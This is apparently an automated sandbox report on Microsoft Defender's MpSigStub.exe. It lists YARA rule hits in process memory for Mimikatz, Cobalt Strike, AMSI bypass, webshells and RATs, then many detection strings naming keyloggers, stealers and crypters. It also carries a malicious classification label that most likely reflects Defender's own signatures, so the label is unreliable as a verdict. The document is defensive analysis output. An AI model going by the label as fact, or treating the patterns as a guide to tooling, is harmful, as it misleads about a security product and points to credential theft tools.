Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Keylogger_CN_APT date = 2016-03-07, author = Florian Roth, description = Keylogger - generic rule for a Chinese variant, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 3efb3b5be39489f19d83af869f11a8ef8e9a09c3c7c0ad84da31fc45afcf06e7
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: WindowsCredentialEditor threat_level = , description = Windows Credential Editor
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_Samples description = Hacktool, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Unidentified_Malware_Two date = 2017-02-10, author = US CERT, description = Unidentified Implant by APT29, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: fe_cpe_ms17_010_ransomware date = 2017-06-27, author = ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick, description = probable petya ransomware using eternalblue, wmic, psexec, version = 1.1, reference = https://www.fireeye.com/blog/threat-research/2017/06/petya-ransomware-spreading-via-eternalblue-exploit.html
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT9002Strings author = Seth Hardy, description = 9002 Identifying Strings, last_modified = 2014-06-25
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gh0st author = https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gholeeV1 Description = Gholee first discovered variant , Reference = http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html, Date = 2014/08, Author = @GelosSnake
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: MW_gholee_v1 date = 2014-08, hash0 = 48573a150562c57742230583456b4c02, sample_filetype = dll, maltype = Remote Access Trojan, description = http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html, Author = @GelosSnake
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Creates files inside the system directory
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0
PE file contains executable resources (Code or Archives)
Source: MpAsDesc.dll.mui18.41.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: MpAsDesc.dll.mui9.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui18.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui9.41.dr Static PE information: No import functions for PE file found
Source: mpasbase.vdm.35.dr Static PE information: No import functions for PE file found
Source: MsMpLics.dll0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui20.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui14.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui15.41.dr Static PE information: No import functions for PE file found
Source: mpavbase.vdm.35.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui35.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui23.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui11.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui1.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui26.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui0.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui3.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui7.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui12.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui30.41.dr Static PE information: No import functions for PE file found
Source: ProtectionManagement.dll.mui.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui4.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui25.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui19.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui4.41.dr Static PE information: No import functions for PE file found
Source: mpavdlta.vdm.34.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui6.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui13.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui13.41.dr Static PE information: No import functions for PE file found
Source: MpEvMsg.dll.mui5.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui11.41.dr Static PE information: No import functions for PE file found
Source: MpAsDesc.dll.mui2.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui21.41.dr Static PE information: No import functions for PE file found
Source: mpuxagent.dll.mui5.41.dr Static PE information: No import functions for PE file found
Enables security privileges
Source: C:\Windows\System32\wevtutil.exe Process token adjusted: Security
Source: mpasdlta.vdm.34.dr Static PE information: Section: .rsrc ZLIB complexity 0.998730014535
Source: mpavdlta.vdm.34.dr Static PE information: Section: .rsrc ZLIB complexity 0.997841282895
Source: classification engine Classification label: mal100.rans.spre.troj.adwa.spyw.expl.evad.mine.winEXE@18/238@3/3
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D01AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError, 42_2_00007FF650D01AE0
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: z1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: \Users\Jatz0r\Desktop\jajajaja\anarko\DRONES 3.0.b\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Microsoft Visual Studio\VB98\pjtAwsVariantioner.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: vbSendMail.vbp
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: 0Desktop\war\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: vC:\Program Files\Microsoft Visual Studio\VB98\pjtbinder.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 1,.+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: Final RS Stealer\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: SN.+\\(BotSupho Compiler|BotSupHo\\.+?\\Server(new)?)(\\Server)?\\Project2\.vbp
Source: MpSigStub.exe, 00000023.00000003.18301552816.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \Asterios\Heriposter.vbpxe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: '"\\Explorador-Remoto\\Servidor.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: Dicionario.vbp
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: \ADWARA\prjX.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: C:\\Users\\box1\\Desktop\\7black2\\[a-zA-Z]{10,}.vbp
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: \W.+:\\Intel\\Obfuscated Number-[0-9]{1,3}\\Obfuscated Nr-[0-9]{1,3}\\[a-zA-Z]{5,15}.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\VAIO\\Desktop\\2012\\[a-zA-Z]+\\GbpSv.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: .+\\Viruses\\Black Project\\Dark_Love.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: *\AD:\Software\Hacking Tools\DDOS tools\STRESS\BBHH-DoS\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: \\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: KeyBoardSpy.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: 50.+\\TUDO\\ARQUIVOS-NOVOS\\Downloader_pak.+\.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: ao com erro\PrjMain.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 0FileEZ HTTP\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: C:\\WINDOWS\\system32\\config\\systemprofile\\.+\\Noway.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: .@*\AG:\NEW\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: Ourcode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 100)
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: \Program Files\Microsoft Visual Studio\VB98\VB Projects\Viruses\HDKP4\HDKP_4.vbp
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: ,z:\abc\load\kombi.vbpxM
Source: MpSigStub.exe, 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp Binary or memory string: @\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: D:\\(BitComet|BingDun|3D Driving-School)\\[a-zA-Z0-9]{10,30}\\(builder|ad)\.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: D:\\Main JOHN\\Recovered KILL\\.*Main Uploader\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: ..\Desktop\Startup\Bitar.vbpxN
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\fuckADX\\.+\\ADs.*\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 4/.+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: B=C:\\Users\\.*\\Desktop\\.*\\Lite-Stub\\Obfuscated .*\\.*.vbp
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: F*\AD:\Junk Programs\Test_Passw20243252017\TestPwd\TestPwd.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 2Crypt3r\demonio666vip.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: P\AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18316847212.0000015B1B582000.00000004.00000001.sdmp Binary or memory string: \Pack.vbp
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: .v2\Pagina\Proyecto1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: C:\\Xinfiltrate STUB\\[a-zA-Z]{3,20}.vbp
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: Lkey logger project\logger\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: C:\Arquivos de programas\Microsoft Visual Studio\VB98\Projetos.frm\Flame Kill\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: .+:\\.+\\rkmVirus\\Yahoo Server\\.+\\rkmVirusYahoo.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \update.vbp
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: papnsappsapusap5tap[yapmyapgabpagbptubp.vbp.wbpu.cpo_cprecpvicp
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: \KDWIN\KDWin.vbp
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: .VBProject.VBComponents(1).CodeModule.deletelines
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp Binary or memory string: \C:\ZKing8\WinZ\WSP\RenoNevada\FTPREM\MyFTP.vbp
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: Pinball.vbp
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: \WINDOWS.VBP]
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: &\SelectCaseEnum.vbp
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: .+\\Apr 14 2011 FileEZ HTTP\\ServiceSample.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: ?:.+\\Abdallah\\.+\\iCrypt2.+\\stub_resources\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: \Virus\Romeo.vbp
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: .vbpa)
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: .:\\Explorer\\Explorer.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: DC:\Base de donnee\test\Projet1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: stub.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: .+keylogger.+server\.vbp
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: A*\AE:\My Programs\Trojans, PS,Hack , Crack\Molela\Molela 1.15 beta\Server\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: -(.+\\mStubmmmm\\Backup.+\\lSUpRQlvPd.vbp
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: \\cryptor.+\\Project1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: Desktop\Russia\Error.vbp
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Binary or memory string: \AYO.vbp
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: ^AJ:\MASTER\ad_compiler\moy.exe\balvanka\ZAG.vbp
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: :5.+\\Hell Packer.+\\gregstubs\\HEX\\HEX\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: AC:\puxa\lenda.vbp
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 3..+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: .vbp
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: E@.+:\\Work\\test\\.+\\Mouchafer\\.+\\.+\\.+_Generated-.*\\.+.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: .+:\\Documents and Settings\\Administrador\\Desktop\\LOAD.+\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: C:\\Documents and Settings\\VAIO\\Desktop\\2012\\Codec\\Graphics.vbp
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp Binary or memory string: 3.\\Laboratorio de Virus\\WinXP\\Downloader.vbp
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: 2*\AC:\y0Za8\wpad\wpad.vbp
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: B=:\\.+\\Indetectables RAT.+p.+is.+\\SIN WINSOCK\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: J\MWP\Processed\Start.B.1\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: MH.+:\\Documents and Settings\\User\\Desktop\\.*pia de.*fab\\Project1.vbp
Source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp Binary or memory string: *\AC:\Users\Administrator\Desktop\VB2\osama.vbpx
